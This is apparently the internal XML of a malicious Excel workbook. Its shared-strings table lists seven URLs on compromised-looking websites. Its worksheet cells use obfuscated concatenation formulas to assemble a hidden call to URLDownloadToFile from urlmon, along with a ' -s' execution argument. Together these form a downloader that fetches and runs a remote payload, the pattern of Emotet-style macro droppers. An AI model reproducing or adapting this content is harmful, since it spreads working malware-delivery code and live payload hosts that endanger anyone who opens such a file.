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CIR\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{AA770D08-2CCF-4A27-B11B-38FB024C9C8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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="19" uniqueCount="19">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"http://buchhave.net/cache/t82rF5S/",</t>
  </si>
  <si>
    <t>"http://bruiserbodies.com/images/vAj7fuqYe5y9/",</t>
  </si>
  <si>
    <t>"https://www.bilandecompetences.fr/administrator/3c/",</t>
  </si>
  <si>
    <t>"http://brittknight.com/PHP/f/",</t>
  </si>
  <si>
    <t>"http://bostonseafarms.com/images/zPgXFMy8VbKNXtFp/",</t>
  </si>
  <si>
    <t>"http://carloshd.com/trulia/4vsUaqQd/",</t>
  </si>
  <si>
    <t>"http://casazulshop.com/Adapter/yJTgSEDEpQvm/",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</si>
</sst>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C15" sqref="C15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="3" spans="4:17" x14ac:dyDescent="0.25">
      <c r="F3" t="str">
        <f>T(Cdfea!E2&amp;Cdfea!D7&amp;Cdfea!P15&amp;Cdfea!P7&amp;Cdfea!P15&amp;Cdfea!E11&amp;Cdfea!F4&amp;Cdfea!B15&amp;Cdfea!D13&amp;Cdfea!E2)</f>
        <v>on","URLDo</v>
      </c>
    </row>
    <row r="7" spans="4:17" x14ac:dyDescent="0.25">
      <c r="D7" t="str">
        <f>T(Cdfea!P11&amp;Cdfea!P15&amp;Cdfea!B5&amp;Cdfea!C3&amp;Cdfea!C9&amp;Cdfea!A12)</f>
        <v>("urlm</v>
      </c>
    </row>
    <row r="9" spans="4:17" x14ac:dyDescent="0.25">
      <c r="Q9" t="str">
        <f>T(Cdfea!P15&amp;Cdfea!P7&amp;Cdfea!P15&amp;Cdfea!J6&amp;Cdfea!J6&amp;Cdfea!H9&amp;Cdfea!H9&amp;Cdfea!K14&amp;Cdfea!K14&amp;Cdfea!P15)</f>
        <v>","JJCCBB"</v>
      </c>
    </row>
    <row r="10" spans="4:17" x14ac:dyDescent="0.25">
      <c r="I10" t="str">
        <f>T(Cdfea!D7&amp;Cdfea!C9&amp;Cdfea!E2&amp;Cdfea!D17&amp;Cdfea!F15&amp;Cdfea!E6&amp;Cdfea!E2&amp;Cdfea!B18&amp;Cdfea!G2&amp;Cdfea!C9)</f>
        <v>nloadToFil</v>
      </c>
    </row>
    <row r="14" spans="4:17" x14ac:dyDescent="0.25">
      <c r="F14" t="s">
        <v>12</v>
      </c>
      <c r="H14" t="s">
        <v>14</v>
      </c>
      <c r="J14" t="s">
        <v>16</v>
      </c>
      <c r="L14" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" spans="4:17" x14ac:dyDescent="0.25">
      <c r="G16" t="s">
        <v>13</v>
      </c>
      <c r="I16" t="s">
        <v>15</v>
      </c>
      <c r="K16" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="21" spans="18:18" x14ac:dyDescent="0.25">
      <c r="R21" t="str">
        <f>T(Cdfea!P19&amp;Cdfea!P2&amp;Cdfea!M7)</f>
        <v xml:space="preserve"> -s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2022-03-16T14:16:51Z</dcterms:modified>
</cp:coreProperties>
</file>